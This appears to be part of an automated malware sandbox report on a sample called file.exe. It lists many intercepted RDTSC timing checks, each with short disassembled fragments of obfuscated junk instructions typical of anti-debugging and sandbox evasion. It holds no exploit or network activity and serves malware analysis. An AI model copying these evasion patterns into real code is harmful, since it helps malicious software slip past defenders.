                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D281C second address: 8D2833 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4123h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2833 second address: 8D2846 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E9917DE28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D47B8 second address: 8D47BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6635 second address: 8D663B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D575C second address: 8D5760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D663B second address: 8D66D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F5E9917DE2Ch 0x00000010 mov edi, 61FD35C5h 0x00000015 pop ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F5E9917DE28h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 pushad 0x00000033 jl 00007F5E9917DE26h 0x00000039 stc 0x0000003a popad 0x0000003b jmp 00007F5E9917DE33h 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007F5E9917DE28h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push eax 0x0000005d pushad 0x0000005e push esi 0x0000005f jmp 00007F5E9917DE36h 0x00000064 pop esi 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 popad 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D5760 second address: 8D5766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6800 second address: 8D680A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5E9917DE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D8739 second address: 8D873F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D873F second address: 8D87E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E9917DE2Dh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F5E9917DE38h 0x00000012 push edx 0x00000013 jmp 00007F5E9917DE31h 0x00000018 pop edx 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F5E9917DE28h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov ebx, dword ptr [ebp+122D339Eh] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F5E9917DE28h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 push 00000000h 0x00000059 mov edi, dword ptr [ebp+122D294Eh] 0x0000005f push eax 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F5E9917DE2Fh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D975A second address: 8D9775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E987E4127h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D9775 second address: 8D9779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D9779 second address: 8D979C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F5E987E4125h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D979C second address: 8D97A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D97A1 second address: 8D9804 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F5E987E4118h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F5E987E4118h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f jg 00007F5E987E4119h 0x00000045 push 00000000h 0x00000047 adc ebx, 37B386C5h 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jnp 00007F5E987E4116h 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D9804 second address: 8D9808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA7CC second address: 8DA7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC8C0 second address: 8DC8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5E9917DE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA9D2 second address: 8DA9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCACD second address: 8DCAD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA9D6 second address: 8DA9F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E987E4127h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DF9AB second address: 8DF9B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA9F5 second address: 8DA9F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA9F9 second address: 8DAA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E9917DE33h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8904BC second address: 8904C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DCBB8 second address: 8DCBD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E219D second address: 8E21A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E5276 second address: 8E5286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F5E9917DE28h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E864A second address: 8E8657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F5E987E4116h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8657 second address: 8E8669 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E8669 second address: 8E8673 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECB32 second address: 8ECB36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECB36 second address: 8ECB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F5E987E4118h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E987E411Dh 0x00000013 jmp 00007F5E987E4120h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ECB63 second address: 8ECB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC325 second address: 8EC329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC329 second address: 8EC34B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ebx 0x0000000c jng 00007F5E9917DE32h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC34B second address: 8EC34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC34F second address: 8EC353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC353 second address: 8EC359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC359 second address: 8EC378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5E9917DE32h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC378 second address: 8EC37C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EC37C second address: 8EC388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F208D second address: 8F20A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E987E4116h 0x0000000a popad 0x0000000b jl 00007F5E987E411Ch 0x00000011 jnp 00007F5E987E4116h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F20A4 second address: 8F20A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F20A9 second address: 8F20AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876F83 second address: 876F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jno 00007F5E9917DE26h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876F94 second address: 876F99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7B26 second address: 8F7B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7B2A second address: 8F7B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E411Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7F39 second address: 8F7F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7F3D second address: 8F7F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F5E987E411Dh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F7F54 second address: 8F7F71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE39h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F820E second address: 8F8215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F83D9 second address: 8F83DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F83DD second address: 8F83E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD6E5 second address: 8FD709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F5E9917DE33h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jnl 00007F5E9917DE26h 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE322 second address: 8FE328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE328 second address: 8FE33F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9917DE2Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE4AD second address: 8FE4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5E987E4116h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE4BD second address: 8FE4C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE4C3 second address: 8FE4D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E987E411Fh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE624 second address: 8FE630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DC6B second address: 87DC76 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DC76 second address: 87DC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E9917DE2Bh 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DC8E second address: 87DC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87DC94 second address: 87DC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FEA64 second address: 8FEA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD3E8 second address: 8FD3F8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E9917DE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90070B second address: 90070F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 906777 second address: 906792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F5E9917DE26h 0x00000009 jmp 00007F5E9917DE30h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887FD3 second address: 887FE1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E987E4116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909F8A second address: 909F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F5E9917DE28h 0x0000000b js 00007F5E9917DE2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6357 second address: 8C635B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C635B second address: 8C638F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F5E9917DE28h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 mov ecx, 19AC73ABh 0x00000015 jno 00007F5E9917DE2Bh 0x0000001b lea eax, dword ptr [ebp+124880A1h] 0x00000021 mov edx, dword ptr [ebp+122D2350h] 0x00000027 nop 0x00000028 push ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C638F second address: 8C6393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6393 second address: 8C6397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6397 second address: 8C63A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F5E987E411Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C63A8 second address: 8AC3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov dx, 7897h 0x0000000a call dword ptr [ebp+122D1846h] 0x00000010 pushad 0x00000011 push ebx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6880 second address: 8C6884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6958 second address: 8C697B instructions: 0x00000000 rdtsc 0x00000002 je 00007F5E9917DE28h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 2117213Ah 0x00000013 or dword ptr [ebp+122D17FFh], esi 0x00000019 push 50C495A4h 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B67 second address: 8C6B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B6D second address: 8C6B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B76 second address: 8C6B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6B7A second address: 8C6B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D5C second address: 8C6D62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D62 second address: 8C6D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D66 second address: 8C6D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F5E987E411Bh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C6D80 second address: 8C6DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F5E9917DE28h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000004h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F5E9917DE28h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Ah 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 mov edi, dword ptr [ebp+122D27CAh] 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b jng 00007F5E9917DE26h 0x00000051 jnl 00007F5E9917DE26h 0x00000057 popad 0x00000058 rdtsc
